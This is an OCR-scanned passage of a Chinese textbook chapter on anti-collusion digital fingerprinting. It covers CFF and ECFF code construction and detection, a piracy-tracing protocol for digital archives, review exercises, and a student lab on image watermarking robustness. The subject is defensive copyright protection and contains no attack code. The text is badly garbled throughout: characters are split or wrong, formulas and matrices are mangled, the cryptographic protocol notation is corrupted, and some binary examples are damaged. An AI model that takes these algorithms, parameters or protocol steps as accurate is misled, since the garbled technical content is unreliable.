000000111000 Il 1 1000 1 1 1 
10000 1010000 0 
0100000 100 10 1 0 1 YO 0 
0010001000 10 1 10111011101 
[loo00000000 1 1 1 [1 1111111100 0j 

图 8-35 关联 和 矩阵 图 8-36 码 字 和 矩阵 


3. r-CFF(n,t) 生 成 算法 

(1) 初始 化 布尔 数组 cFlag[nj[n]。cFlag 的 第 i 行 第 j 列 (1 志 i,j 志 nn) 值 为 0 表示 元 素 
对 <i,j > 已 出 现在 某 一 CFF 区 组 中 ,不 可 再 次 用 于 CFF 区 组 设计 ; 为 1 表示 < i,j > 还 未 用 
于 CFF 区 组 设计 。CFF 区 组 设计 定义 要 求 <i,i> 不 出 现在 CFF 区 组 设计 中 ,所 以 cFlag 初 
始 时 对 角 线 元 素 值 为 0, 其余 元 素 值 为 1。 

约定 nn 和 wv 满足 条 件 n 三 m(r 十 1) ,m 应 取 满 足 条 件 的 最 小 正 整数 。 例 如 对 2-CFF(10， 
用,m 取 4,2-CFF(10, 了 有) 实际 按 2-CFF(12, 了) 生成 。 

(2) 生成 基础 集 。 根 据 组 合 数学 {(1,…,r 十 1),(r 十 2,…,2r 十 2)，…, (2 一 rw72)) 和 
{(1,/(Cr 十 1) 十 1，…,CrXza)/Gr 十 1) 十 1), (2,z/Cr 十 1) 十 2 ， CrX1D)/Cr 十 1) 十 2),…， 
Ga/Cr 十 1) ,2n/(r 十 1),…,n)) 的 并 集 为 CFF 基础 集 , 以 此 为 初始 结果 集 , 同 时 修改 cFlag 
对 应 值 。 

2-CFF(12, 了) 的 基础 集 为 {(1,2,3)(4,5,6)(7,8,9)(1,5,9)(2,6,10)(3,7,11)(4,8，, 
12)(10,11,12)}。 如 图 8-37 所 示 ,在 cFlag 中 将 每 个 区 组 所 有 元 素 对 < ij > 对 应 的 位 置 设 
为 0。 例 如 ,区 组 (1,2,3) 要 求 将 cFlag 的 <1,2 ><1,3 ><2,3><2,1 ><3,1 ><3,2 > 位 置 设 
为 0。 

(3) 对 集合 x 中 的 元 素 按 (r 十 1) 个 元 素 一 组 依次 进行 (~ 十 1) 阶 全 排列 ,遍历 每 个 全 排 
列 构 成 的 所 有 区 组 ,判断 某 个 区 组 的 元 素 对 < i,j > 是 否 已 在 cFlag 中 出 现 (cFlag 对 应 值 为 
0) ,出 现 则 舍弃 该 区 组 ;否则 继续 遍历 其 他 <i,j > 直至 遍历 结束 。 

遍历 结束 后 ,车 该 区 组 的 所 有 元 素 对 ,<i,j > 在 cFlag 中 均 未 出 现 过 (cFlag 对 应 值 为 
1), 则 加 入 该 区 组 到 结果 集中 ,同时 修改 cFlag 对 应 值 。 

讨论 以 1 开头 的 3 阶 全 排列 ,由 图 8-37 可 知 ,<1,1 ><1,2><1,3 > 为 0, 所 以 11、12、13 
开头 的 区 组 不 是 CFF 区 组 ; 14 开头 的 3 阶 全 排列 有 : (1,4,2)…(1,4,12)10 个 ,由 于 < 1,2 > 
为 0, 故 (1,4,2) 不 是 CFF 区 组 ; ……; (1,4,7) 中 <1,4><1,7><4,7><4,1><7,1><7， 
4 > 均 为 1, 故 (1,4,7) 是 CFF 区 组 ,加 入 结果 集中 ,同时 修改 cFlag 对 应 值 如 图 8-38 所 示 。 

以 此 类 推 ,2-CFF(12, 放 最 终 可 生成 上 述 的 16 个 区 组 ,所 以 :一 16。 
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oO000 0 4 0 0110000011 .10 
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图 8-37 “Flag 值 一 图 8-38 cFlag 值 二 


8.5.3 ECFF 编码 


1 码 生 成 容易 ,可 容纳 用 户 数理 论 上 不 受 限 制 ; CFF 编码 具有 码 距 大 、 抗 干扰 能 力 强 的 
优势 ,能 够 有 效 缩短 编码 长 度 , 因 此 结合 两 者 优点 提出 的 CFF 码 和 工 码 级 联 编码 是 一 种 抗 
干扰 能 力 强 且 编 码 空间 大 ,能 同时 抵抗 与 合谋 或 合谋 等 多 种 合谋 攻击 ,有 效 跟踪 合谋 用 户 
的 指纹 编码 , 称 为 扩展 CFF(Eextension CFF ,ECFF) 编 码 。 

级 联 码 有 内 码 和 外 码 两 级 编码 组 成 ,内 码 决定 追踪 能 力 、 外 码 决定 追踪 效率 。 将 CFF 
码 作为 内 码 ,I 码 作为 外 码 进行 级 联 编码 。 新 编码 提高 了 编码 效率 ,降低 了 编码 难度 ,具有 
抗 干 扰 能 力 强 且 编 码 空间 大 、 能 够 抗击 ~ 个 用 户 合谋 攻击 ,对 分 发 人 数 无 限制 的 优势 ; 能 同 
时 抵抗 与 合谋 .或 合谋 等 多 种 合谋 攻击 .具有 良好 的 抗 合谋 性 能 ; 能 有 效 跟踪 到 合谋 用 户 的 
指纹 编码 ,确定 叛逆 者 。 

1. ECFF 编码 算法 

(1) 选 定编 码 元 素 集合 x、 最 大 抗 合谋 人 数 ,设计 让 CFF(n,t) 区 组 集合 f ,得 到 区 组 
数 1。 

(2) 根据 分 发 的 用 户 总 数 N ,计算 六 = NA 向 上 取 整 作为 1 码 的 大 小 。 例 如 N= 二 48, 使 
用 2-CFF(12,16) ,1 码 大 小 m= 二 48/16 二 3。 

(3) 构造 一 个 mXm 的 单位 矩阵 , 扩展 每 个 码 字 为 +Xn 的 子 阵 。 其 中 码 比特 1 扩展 为 
全 1 的 izXn 子 阵 , 码 比 特 0 扩展 为 全 0 的 tzXn 子 阵 。 

(4) 将 扩展 矩阵 对 角 线 上 全 1 的 +Xn 子 阵 蔡 换 为 由 CFF 设计 生成 的 1Xn 的 关联 算 阵 
M ,生成 级 联 编码 关联 矩阵 T。 

Mw Oly ei 0a.n 
O04.n 
T| ~ ws Mf BE |(mXt,mXn) 


Oam i … 00 Man 
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Cam lan 人 la,n 
Ou ne lan 
R=| ww O00 Cown le (mxXt,mXn) 
O04 pe lao,» 
04m 和 Ee 0cm Coan 
(5) 将 工 中 各 M (zt,n) 子 块 及 各 M(t,n) 子 块 右 侧 的 所 有 0(z, nn) 子 块 的 元 素 取 反 , 产 
生 级 联 编码 码 字 和 矩阵 R。 


R 中 任意 两 行 都 是 不 相同 的 ,这 保证 了 R 中 每 一 行 码 字 都 可 以 作为 一 个 身份 的 认证 信 
息 (指纹 编码 ) ,它们 具有 和 x-CFF 设计 相同 的 抗 合谋 性 质 , 能 有 效 抵抗 合谋 攻击 。 

由 上 述 方法 产生 的 级 联 编码 用 户 容 量 为 m Xt, 码 字 长 度 为 m Xn, 编 码 效率 y= Gm X 
四/(mXn) 二 t/n。 这 说 明 级 联 编码 的 编码 效率 实际 上 等 同 于 租 入 的 CFF 码 的 编码 效率 。 
因此 采用 容易 构造 的 小 参数 CFF 码 作为 内 码 ,然后 与 外 码 I 码 级 联 就 能 构建 容纳 大 用 户 数 
的 级 联 编码 ,有 效 降低 编码 构造 复杂 性 ,并 且 用 户 数理 论 上 不 受 限制 , 比 单纯 的 CFF 码 更 加 
高 效 。 

(6) 为 进一步 有 效 抵抗 平均 合谋 攻击 ,使 用 编码 扩展 技术 对 码 字 和 矩阵 R 进行 级 联 编码 
扩展 : 用 序列 10 和 01 对 尽 所 有 C (t,n) 块 中 的 1 和 0 进行 扩展 为 C(1,2n), 并 且 对 R 中 每 
个 扩展 前 的 C(t, 芭 ) 块 左边 的 0 (1,n) 块 扩展 为 0 (1,2n) ,右边 的 1 (1,) 块 扩展 为 1 (1,2n)， 


得 到 最 终 的 码 字 矩阵 C。 
Cosam lon bi A la.2m 
O42 2 lu,zw 
C= O02m Co2m lo (mXt,2mXn) 
Oa,2m de la.2m 
Ou,2m ee 人 O02m Cu 


C 中 元 素 具 有 规律 性 : CFF 子 块 同时 含有 码 比特 0 与 码 比特 1; 1 子 块 不 含 码 比特 0; 
0 子 块 不 含 码 比特 1。 因此 通过 对 0 与 1 同时 出 现 区 域 的 定位 就 可 以 确定 CFF 子 块 在 级 联 
码 中 的 位 置 。 具 体 实 例 见 图 8-39 。 





100101010110010101011001 
100101010101100101100101 
011001011001010101011001 
011001010101100101010110 
010110011001010101100101 
010110010110010110010101 
011001100101010110010101 


000000000000000000000000 
000000000000000000000000 
000000000000000000000000 
000000000000000000000000 
000000000000000000000000 
000000000000000000000000 
000000000000000000000000 


111111111111111111111111 
111111111111111111111111 
111111111111111111111111 
111111111111111111111111 
111111111111111111111111 
111111111111111111111111 
111111111111111111111111 


101010010101010101010101 
O10101101010010101010101 
O10101010101101010010101 
O10101010101010101101010 
100101011001010110010101 
011001010110010101100101 
010110010101100101011001 








图 8-39 ” 码 字 和 矩阵 左上 角 内 容 
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2. ECFF 检测 算法 

(1) 确定 编码 所 在 CFF 子 块 位 置 。 根 据 C 中 元 素 规律 性 可 知 : 每 条 指纹 编码 含有 0 的 个 
数 是 CFF 码 字 长 度 的 倍数 ,所 以 统计 0 的 个 数 后 ,对 2n 进行 整除 向 上 取 整 ,就 得 到 编码 所 在 
块 的 位 置 。 如 图 8-39 最 后 一 行 指纹 : 000000000000000000000000 010110010101100101011001 
111111111111111111111111 中 0 的 个 数 为 36,n 二 12, 所 以 该 指纹 所 在 CFF 编码 块 位 置 为 2。 

(2) 确定 合谋 用 户 。 在 CFF 子 块 中 任意 不 大 于 -个 用 户 合谋 产生 的 向 量 都 是 唯一 的 ， 
因此 确定 CFF 子 块 位 置 后 ,对 指纹 特征 码 字 位 置 进行 跟踪 便 可 检测 出 参与 合谋 的 用 户 。 

具体 做 法 为 : 从 数据 库 中 取出 具有 相同 CFF 编码 的 所 有 指纹 ,逐条 计算 指纹 与 被 追踪 
指纹 的 汉 明 距离 ,找到 具有 汉 明 距离 最 小 的 指纹 认定 为 叛逆 者 指纹 。 

显然 级 联 编码 检测 实质 是 CFF 编码 检测 ,由 于 级 联 编码 使 用 的 CFF 编码 码 长 较 短 , 因 
此 特征 编码 集 存储 ,检测 花费 的 时 间 、 空 间 开 销 以 及 运算 复杂 度 都 大 大 降低 ,具有 很 高 的 检 
测 效 率 。 


8.5.4 数字 档案 盗版 追踪 系统 


抗 合 谋 数字 指纹 能 够 从 多 用 户 合谋 伪造 数字 档案 中 准确 识别 出 参与 者 ,为 追踪 湖 源 非 
法 使 用 者 提供 不 可 抵赖 法 律 数 字 取证 证 据 , 保 护 数字 资源 信息 安全 。 我 们 将 ECFF 编码 应 
用 于 应 用 于 解决 数字 档案 分 发 控制 和 用 户 身份 真实 性 保护 ,设计 开发 了 数字 档案 盗版 追踪 
系统 。 系 统 总 体 流程 图 如 图 8-40 所 示 。 







数字 档案 服务 器 
Asdas(dip'， das 
Kpdas(Kpts( 四) ~、、 Kpdas(ID,, 
~ Kss(Kpes( 1))) 
Kral KlID)) 、、 
Kpass(Ksts(ID)) ~、、 
数字 档案 用 户 一 _。 数字 指纹 服务 器 
ID, 注册 人 


图 8-40 系统 总 体 流 程 图 


(1) 数字 指纹 初始 化 。 数 字 指 纹 服务 器 (fingerprinting server,fs) 使 用 ECFF 编码 方法 
生成 ECFF 数字 指纹 集 , 独 立 保 存 指纹 生成 参数 ,确保 不 知道 参数 条 件 下 难以 伪造 数字 
指纹 。 

(2) 合法 用 户 注册 。 用 户 ID; 登录 注册 ,fs 为 每 个 用 户 分 配 唯 一 ECFF 数字 指纹 fi; 标 
识 用 户 ID; ,fs 使 用 私 钥 Ki 签名 ID; 发 送 氏 asCKs(GID,)) 给 用 户 ID, , 公 钥 Ka 加 密 f; 发送 
Kas(IDi ,Kus( 广 )) 给 数字 档案 服务 器 das(digital archives server) 。 

使 用 KasCM) 加 密 数 据 M 的 目的 是 保证 数据 传输 的 机 密 性 。 

用 户 ID; 没有 解密 Ks 对 应 的 私 钥 Ks, 所 以 不 能 独立 伪造 Kas (Ks (ID;)) 假 冒 用 户 
ID; , 即 (ID;, Kyass (Ks (ID;))) 和 (ID; ,Kbpss (Ks (ID;))) 虚 假 对 应 关系 不 成 立 ; 用 户 ID; 保存 
KK vaos (Ks (ID;)) 作 为 凭证 防止 fs 否认 用 户 ID; 已 注册 。 

das 使 用 私 钥 ,解密 Kwaos (ID; ,Ks (Kr (fi))) 存 储 (ID; ,Kes( 广 )) 的 对 应 关系 ,但 不 
知道 f; 的 具体 值 ,确保 只 有 fs 独立 保存 有 (ID;, fi) 的 对 应 关系 ,保证 das 不 能 独立 伪造 ff; 
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和 天 me( 广 )。 

用 户 注 册 为 一 次 性 工作 ,注册 完成 后 ,fs 与 das、ID; 之 间 不 再 进行 信息 交换 ,有 利于 数 
字 指 纹 保密 和 减轻 fs 的 工作 负荷 。 

fs 的 作用 类 似 于 CA ,作为 第 三 方 进行 用 户 身份 认证 ,确保 用 户 身份 真实 性 ; 预防 数字 
档案 管理 方 诬陷 用 户 ,辅助 实现 盗版 追踪 。 

das 的 作用 是 进行 数字 档案 的 日 常 维护 管理 ,进行 数字 指纹 的 嵌入 提取 。 

(3) das 实时 记录 数字 档案 生命 周期 全 过 程 中 的 每 一 个 操作 (包括 操作 人 、 操 作 内 容 、 日 
期 时 间 等 信息 ) 。 

用 户 ID; 向 das 申请 使 用 特定 数字 档案 A,das 使 用 私 钥 Ke. 和 fs 的 公 钥 Kw 先后 解密 
paos (Ks (1D;)) ,判断 Ky (Kass (Kpaos (Ks (ID;)))) 二 ID; 等 式 是 否 成 立 , 验 证 用 户 ID; 身份 
真实 性 。 等 式 不 成 立 则 拒绝 分 发 数字 档案 A; 成 立 则 选择 嵌入 参数 将 ID; 对 应 的 Km( 方 )、 
时 间 截 等 蔡 入 数字 档案 A 生成 Am ,然后 使 用 das 私 钥 Ka 签名 生成 K sos (Ais Kpans (Kpis 
(fi 站))) 发 送 给 用 户 ID;。 

该 步骤 进行 了 用 户 Ini 的 身份 认证 ,保证 了 das 分 发 给 用 户 ID; 的 每 个 数字 档案 Am 中 
都 从 有 密 文 状 态 的 唯一 ECFF 数字 指纹 Kes( 广 ) 。 

用 户 ID; 收 到 的 开 as(CAmp ,Kpas (Krss (fi))) 保 证 了 das 不 能 否认 生成 、 发 送 过 Am ,不 
能 否认 存在 (Am ,KussCKne( 广 ))) 对 应 关系 。 

(4) 发 现 非法 使 用 数字 档案 Am ,司法 部 门 要 求 das 从 Am 中 提取 天 ms (fj;), 计 算 Kp 
( 方 ) 与 指纹 数据 库 中 存储 的 (ID ,Knee( 方 )) 的 余弦 相似 度 , 认 定 相似 度 最 小 的 数字 指纹 对 应 
用 户 为 非法 使 用 者 ID; ,提交 (ID; ,Km (f;)); 司法 部 门 要 求 fs 对 非法 使 用 者 ID; 进行 身份 
认证 ,根据 das 提供 的 (IDi ,Kes( 广 )) ,使 用 私 钥 Ke 解密 Kme( 广 ) 获 得 唯一 ECFF 数字 指纹 
方 ,比较 (ID ,fi) 与 fs 中 存储 的 (1D;,f;) 是 否 一 致 ,一 致 则 可 确定 非法 使 用 者 ID ,否则 需要 
进一步 收集 证 据 ; 司法 部 门 以 (Am 一 Kes (fi) 习 fi 习 ID; ) 关 联 关系 作为 数字 证 据 实 现 追 踪 
非法 使 用 者 ID 。 

协议 规定 了 das \fs、U; 三 方 相互 制约 关系 ,要 求 至 少 有 两 方 参与 才能 实现 ECFF 嵌入 提 
取 , 体 现 了 协议 的 非 对 称 性 。das 独立 存储 嵌入 提取 参数 ,实现 嵌入 提取 功能 ,但 无 法 独立 
伪造 嵌入 的 数字 指纹 Km ( 方 ) ,所 以 不 可 能 独立 生成 正确 的 An; fs 知道 (Kme( 方 ) 一 广 一 
IDi ) ,但 不 知道 嵌入 提取 参数 因而 无 法 进行 正确 的 ECFF 嵌入 提取 ; U; 既 不 知道 做 入 提取 
参数 ,也 不 知道 Km (fi) ,更 加 难以 伪造 Am 。 

不 同 用 户 向 同一 数字 档案 嵌入 的 数字 指纹 虽然 不 同 ,但 数字 指纹 嵌入 位 置 是 相同 的 , 因 
此 多 个 不 同 用 户 比较 相同 数字 档案 多 个 版 本 的 不 同 之 处 就 可 发 现 数 字 指 纹 嵌 人 可 探测 位 ， 
进而 移 除 或 修改 可 探测 位 的 值 , 改 变 嵌 入 数字 指纹 序列 生成 新 数字 档案 。 

系统 提取 盗版 作品 吝 入 的 用 户 指纹 追踪 盗版 的 来 源 ,实现 对 产道 者 进行 追踪 ,为 依法 审 
判 叛逆 者 提供 法 律 依据 ,使 其 受到 相应 法 律 制 裁 ,对 非法 复制 数字 档案 起 到 法 律 惩罚 、 震 慑 
作用 ,从 而 起 到 数字 版 权 保护 作用 。 

系统 采用 离散 余弦 变换 和 离散 小 波 变 换 相 结合 的 方法 嵌入 提取 指纹 ,保证 指纹 具有 和 良 
好 的 不 可 感知 性 和 稳健 性 。 指 纹 在 音频 中 的 嵌入 位 置 由 嵌入 时 随机 参数 确定 ,增加 了 指纹 
破解 的 难度 。 

测试 结果 表明 ,各 种 合谋 攻击 后 提取 的 指纹 编码 匹配 率 均 在 80% 以 上 ,未 发 生 误 判 、. 漏 
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判 现象 ,说 明 ECFF 编码 能 较 好 地 抵抗 多 种 合谋 攻击 ,有 效 追 踪 叛 逆 者 。 
例如 ,指纹 1(3,7.11)1001 0101 1010 1110 0110 0111 1010 1001 1001 0110 1110 1101 
和 指纹 2(4,8,12) 1001 1010 1010 0001 0110 1000 1010 1001 1001 0110 1110 1101 测试 结 
果 为 ; 
提取 的 与 合谋 结果 为 1001 0000 1010 0000 0110 0000 1010 1001 1001 0110 1110 1101; 
提取 的 或 合谋 结果 为 1001 1111 1010 1111 0110 1111 1010 1001 1001 0110 1110 1101; 
提取 的 平均 合谋 结果 为 1001 0000 1010 0000 0110 0000 1010 1001 1001 0110 1110 1101。 
表 8-8 为 计算 的 合谋 指纹 匹配 率 , 判 定 匹 配 率 大 的 指纹 对 应 叛逆 者 。 


表 8-8 合谋 指纹 匹配 率 

















合谋 类 型 与 指纹 1 匹配 率 与 指纹 2 匹配 率 
与 合谋 83.3% 91.6% 
或 合谋 91.6% 83.3% 
平均 合谋 83.3% 91.6% 
习 题 8 


8.1 信息 隐藏 

1. 信息 隐藏 是 ( ys 
2. 信息 隐藏 的 特性 为 ( jt jt yt 2 he 
3. 信息 隐藏 和 密码 学 有 哪些 区 别 ? 

4. 信息 隐藏 通用 模型 由 哪 几 部 分 组 成 ? 

8.2 数字 水 印 技术 

1. 什么 是 数字 水 印 技术 ? 

2. 数字 水 印 技术 是 如 何 证 实 该 数据 的 所 有 权 的 ? 
3. 数字 水 印 技术 包括 ( 区 ) 和 ( )3 个 过 程 。 
4. 请 简 述 数字 水 印 技术 的 一 般 特 性 。 

5. 数字 水 印 按 水 印 的 可 见 性 可 分 为 哪些 ? 并 简 述 。 
6. 按照 水 印 的 载体 ,数字 水 印 技术 可 分 为 ( jC ) 和 it yl 入 
7. 数字 水 印 技术 有 哪些 应 用 ? 

8.3 ”图 像 数字 水 印 

1. 什么 是 图 像 数字 水 印 ? 

2. 图 像 数字 水 印 嵌 入 提取 的 难点 有 哪些 ? 

3. 请 简 述 明 水 印 嵌 入 的 一 般 流程 

4. 明 水 印 图 像 在 载体 图 像 中 的 嵌入 提取 算法 主要 有 哪些? 

8.4 ”数据 库 数字 水 印 

1. 数据 库 零 水 印 有 哪些 缺陷 ? 

2. 什么 是 零 宽 度 不 可 见 字符 ? 
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3. 在 判断 版 权 归属 时 采用 多 数 表决 来 进一步 提高 检查 结果 得 可 信和 度 , 具 体 做 法 有 
哪些 ? 
8.5 数字 指纹 
1. 什么 是 数字 指纹 ? 
. 数字 指纹 盗版 追踪 模型 由 ( st ba )3 部 分 构成 。 
. 简 述 I 码 - 抗 合谋 原理 。 
. 简 述 ECFF 编码 算法 的 一 般 实现 过 程 。 
. 开发 了 数字 档案 盗版 追踪 系统 的 一 般 步 骤 有 哪些 ? 


wo 


实验 7 图 像 数 字 水 印 


【实验 目的 】 


引导 学 生 掌 握 经 典 的 图 像 旋 转 、 缩 放 、 加 噪 算法 及 其 实现 ,掌握 经 典 的 图 像 数字 水 印 嵌 
和 提取 算法 及 其 实现 ,感受 图 像 数字 水 印 在 图 像 版 权 保护 中 的 作用 ,培养 学 生 编程 实现 完整 
软件 系统 的 工程 能 力 和 综合 运用 所 学 知识 的 能 力 ,提高 学 生 学 习 兴 趣 。 

(1) 自学 Open CV 中 cvGet2DO) 和 cvSet2D() 函数 的 使 用 方法 ; 

(2) 学 习 图 像 旋转 、 缩 放 \ 加 噪 的 矩阵 变换 理论 ; 

(3) 学 习 图 像 数字 水 印 嵌 入 提取 的 原理 ; 

(4) 编程 实现 (2)、(3) 内 容 。 按 照 软件 工程 要 求 设计 一 个 完整 的 软件 系统 ,图 形 化 界面 
交互 友好 ,功能 完整 ,具有 扩充 性 ; 设计 表格 记录 实验 过 程 提取 的 水 印 图 像 , 计 算 提 取水 印 
与 水 印 图 像 的 汉 明 距离 ,确定 攻击 阔 值 。 

(5) 讨论 思考 题 提 出 的 问题 ,给 出 具体 解决 方法 ,编程 验证 提出 解决 方法 的 可 行 性 。 
(可 选 做 ) 

(6) 撰写 实验 报告 ,并 通过 分 组 演讲 ,学 习 交 流 不 同 数 字 水 印 嵌入 提取 方法 的 优 缺 点 。 


【实验 内 容 】 


(1) 掌握 Open CV 中 cvGet2D() 和 cvSet2D() 函 数 的 使 用 方法 ,实现 图 像 与 图 像 像 素 
矩阵 的 相互 转换 ,通过 对 像素 矩阵 进行 矩阵 运算 实现 图 像 旋转 、 缩 放 、 加 噪 。 

(2) 实现 在 载体 图 像 左上 角 嵌 入 水 印 图 像 ; 从 含 言 水 印 图 像 提取 嵌入 的 水 印 图 像 。 

(3) 对 含 盲 水 印 图 像 进行 90".180" .270" 旋 转 后 提取 水 印 图 像 。 

(4) 对 含 盲 水 印 图 像 依次 加 入 5% 、10%…… 的 椒盐 噪声 进行 加 噪 攻击 ,然后 提取 水 印 
图 像 ; 计算 不 同比 例 噪 声 下 水 印 图 像 与 提取 水 印 的 汉 明 距离 ,确定 加 噪 比例 阔 值 。 

(5) 对 含 盲 水 印 图 像 进行 缩放 攻击 后 提取 水 印 图 像 。 

(6) 实现 在 载体 图 像 任意 位 置 嵌入 和 提取 水 印 图 像 ， 同学 间 交 换 含 言 水 印 载体 图 像 提 
取水 印 图 像 ,根据 成 功 提取 出 其 他 同学 水 印 图 像 个 数 、 提 取 所 用 时 间 、 提 取水 印 准 确 程 度 评 
定 实验 成 绩 ; 分 析 总 结 盲 水 印 的 优 缺点 。 

(7) 使 用 LSB 方 法 实现 明 水 印 的 嵌入 和 提取 ,对 含 明 水 印 图 像 进行 旋转 、 加 噪 、 缩 放 攻 
击 ,进行 盲 水 印 和 明 水 印 性 能 比较 。 

(8) 使 用 logistics 随机 函数 生成 图 像 嵌 入 位 置 ,实现 在 随机 载体 图 像 位 置 嵌 入 和 提取 
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明 水 印 ,实验 成 绩 评定 方法 同 (6) 。 
(9) 自选 其 他 方法 实现 明 水 印 嵌 入 提取 。( 可 选 做 ) 


【实验 内 容 1】 

图 像 与 图 像 像素 矩阵 的 相互 转换 
【实验 原理 】 

略 
【实验 方案 】 


1. 图 像 到 图 像 像素 矩阵 的 转换 

(1) 将 水 印 图 像 ( 见 图 8-41) 转 换 为 类 似 图 8-42 的 图 像 像 素 和 矩阵 输出 ,对 比 两 者 说 明 对 
应 关系 ,记录 图 像 像素 矩阵 。 

(2) 以 自己 的 身份 证 照片 为 载体 图 像 ( 见 图 8-43) ,将 其 转换 为 R、G、B 3 个 不 同 图 像 像 
素 和 矩阵 输出 ,记录 3 个 图 像 像素 矩阵 ,比较 该 图 像 像素 矩阵 与 (1) 的 图 像 像 素 和 矩阵 的 不 同 。 

2. 图 像 像 素 矩阵 到 图 像 的 转换 

(1) 将 “1. 图 像 到 图 像 像 素 和 矩阵 的 转换 ”(1) 所 得 图 像 像素 矩阵 转换 为 图 像 输 出 ,比较 输 
出 图 像 与 水 印 图 像 的 差异 ,计算 两 者 的 汉 明 距离 。 

(2) 将 “1. 图 像 到 图 像 像 素 和 矩阵 的 转换 "(2) 所 得 R、G、B 3 个 不 同 图 像 像素 矩阵 相 加 后 
转换 为 图 像 输出 ,比较 输出 图 像 与 载体 图 像 的 差异 ,计算 两 者 的 汉 明 距离 。 


P 
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图 8-41 水 印 图 像 8-42 ”图像 像素 矩阵 图 8-43 ”载体 图 像 


【实验 内 容 2】 

图 像 旋 转 、 缩 放 、 加 品 
【实验 原理 】 

略 
【实验 方案 】 

1. 图 像 旋转 
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编程 实现 载体 图 像 ( 见 图 8-43) 进 行 不 同 角 度 旋转 ,记录 输出 结果 到 表 8-9 。 
表 8-9 不 同 角度 图 像 旋转 比较 
顺 时 针 45° 顺 时 针 90” 顺 时 针 180” 顺 时 针 270° 








思考 题 : 顺 时 针 45 旋转 时 会 出 现 什么 问题 ? 如 何 解 决 ? 
2. 图 像 缩放 
采用 近邻 取样 插值 法 编程 实现 载体 图 像 不 同比 例 旋转 ,记录 输出 结果 到 表 8-10。 
表 8-10 不 同比 例 图 像 缩放 比较 
缩小 1/4 缩小 1/2 扩大 1/2 扩大 1 倍 





近邻 取样 插值 法 
二 次 线性 插值 


思考 题 : 二 次 线性 插值 法 如 何 实现 图 像 缩 放 ? (可 选 做 ) 

3. 图 像 的 加 噪 

采用 椒盐 加 噪 方法 编程 实现 载体 图 像 不 同比 例 加 噪 , 记 录 输 出 结果 到 表 8-11 ,计算 加 
噪 图 像 与 载体 图 像 的 汉 明 距离 十 人 表 8-11。 


表 8-11 不 同 加 噪 比例 图 像 比较 


加 噪 比例 5% 10% 15% 20% 
加 噪 图 像 
汉 明 距离 





思考 题 如 何 确定 加 噪 比例 阔 值 ? 
【实验 内 容 3】 

盲 水 印 嵌 入 提取 
【实验 原理 】 

略 
【实验 方案 】 


1. 固定 位 置 言 水 印 嵌 入 提取 

编程 实现 在 载体 图 像 ( 见 图 8-43) 左 上 角 嵌 入 水 印 图 像 生成 含水 印 图 像 ,并 对 含水 印 图 
像 进行 旋转 \ 缩 放 、 加 品 攻 击 后 提取 水 印 图 像 .计算 提取 水 印 图 像 与 水 印 图 像 ( 见 图 8-41) 的 
汉 明 距离 十 人 表 8-12。 
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表 8-12 ”不同 攻击 后 提取 水 印 图 像 比 较 


攻击 方式 旋 转 缩 放 加 噪 旋转 十 加 曲 


提取 水 印 
汉 明 距离 





2. 随机 位 置 盲 水 印 租 入 提取 
编程 实现 在 载体 图 像 随机 位 置 嵌 和 人 水印 图 像 生成 含水 印 图 像 , 并 对 含水 印 图 像 进行 旋 
转 、 缩 放 . 加 噪 攻击 后 提取 水 印 图 像 ,计算 提取 水 印 图 像 与 水 印 图 像 的 汉 明 距离 十 人 
表 8-13。 
表 8-13 不 同 攻击 后 提取 水 印 图 像 比较 


攻击 方式 旋 转 缩 放 加 品 旋转 十 加 品 


提取 水 印 
汉 明 距离 





思考 题 如 何 使 用 logistics 随机 函数 生成 水 印 骨 入 位 置 ? 如 何 保证 水 印 嵌 入 位 置 的 机 
密 性 ? 
【实验 内 容 4】 
明 水 印 戏 入 提取 
【实验 原理 】 
略 
【实验 方案 】 


使 用 LSB 算法 编程 实现 在 载体 图 像 左 上 角 嵌 入 水 印 图 像 生成 含水 印 图 像 ,并 对 含水 印 
图 像 进行 旋转 、 缩 放 、 加 噪 攻击 后 提取 水 印 图 像 ,计算 提取 水 印 图 像 与 水 印 图像 的 汉 明 距离 
填 人 表 8-14。 
表 8-14 不 同 攻击 后 提取 水 印 图 像 比较 
攻击 方式 旋转 缩 放 加 品 旋转 十 加 品 


提取 水 印 
汉 明 距离 





思考 题 : 如 何 使 用 变换 域 算 法 (DCT、.DWT) 实 现 明 水 印 的 嵌入 提取 ? 
【实验 内 容 5】 
图 像 数 字 水 印 攻防 对 抗 (可 选 做 ) 
【实验 原理 】 
图 像 数 字 水 印 的 主要 功能 是 标示 图 像 版 权 所 有 者 ,进行 图 像 版 权 保 护 。 图 像 版 权 保 护 
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者 需要 保证 含水 印 载体 图 像 进行 正常 图 像 处 理 后 不 会 破坏 水 印 图 像 正确 提取 ,经 图 像 盗版 
者 各 种 攻击 后 仍 能 准确 提取 出 水 印 图 像 ; 图 像 盗版 者 为 了 逃避 法 律 制裁 , 则 会 对 含水 印 载 
体 图 像 进行 各 种 攻击 ,试图 达到 破坏 水 印 图 像 正确 提取 的 目的 。 两 者 的 技术 对 抗 必 将 长 期 
存在 ,相互 促进 ,不 断 发 展 。 

实验 通过 保密 水 印 图 像 嵌 入 位 置 ,提高 水 印 戏 入 算法 的 鲁 棒 性 ,公开 含水 印 载体 图 像 实 
现 图 像 版 权 保护 ,预防 盗版 者 破坏 图 像 数字 水 印 ; 盗版 者 通过 不 断 改 进攻 击 方法 ,破坏 从 含 
水 印 载体 图 像 中 正确 提取 水 印 图 像 减 轻 自己 的 罪责 ,逃避 法 律 制裁 。 


【实验 方案 】 


(1) 每 位 同学 将 自己 的 姓名 制作 为 类 似 图 8-41 的 水 印 图 像 ,然后 自选 嵌入 位 置 ,分 别 
选择 一 种 盲 水 印 嵌 入 方法 和 明 水 印 骨 入 方法 实现 水 印 图 像 嵌 入 载体 图 像 ( 见 图 8-43) ,将 会 
水 印 载体 图 像 以 学 号 十 A 和 学 号 十 B 命名 提交 实验 网 站 。 

要 求学 生 不 公布 自己 使 用 的 岩 和 算法、 嵌入 位 置 ,允许 学 生 对 含水 印 载体 图 像 进行 各 种 
攻击 后 上 传 , 但 攻击 后 应 保证 自己 能 够 提取 出 可 识别 的 水 印 图 像 ,否则 学 生 实验 成 绩 评 定 为 
不 及 格 。 

(2) 每 位 同学 从 实验 网 站 下 载 含水 印 载体 图 像 ,提取 其 中 的 水 印 图像 提 交 到 实验 网 站 。 

(3) 实验 成 绩 根据 提取 正确 的 水 印 图 像 个 数 .第 一 次 水 印 图 像 正确 提交 使 用 时 间 ,水印 
图 像 质量 排名 评定 。 


【实验 报告 要 求 】 


实验 报告 需要 反映 以 下 工作 : 

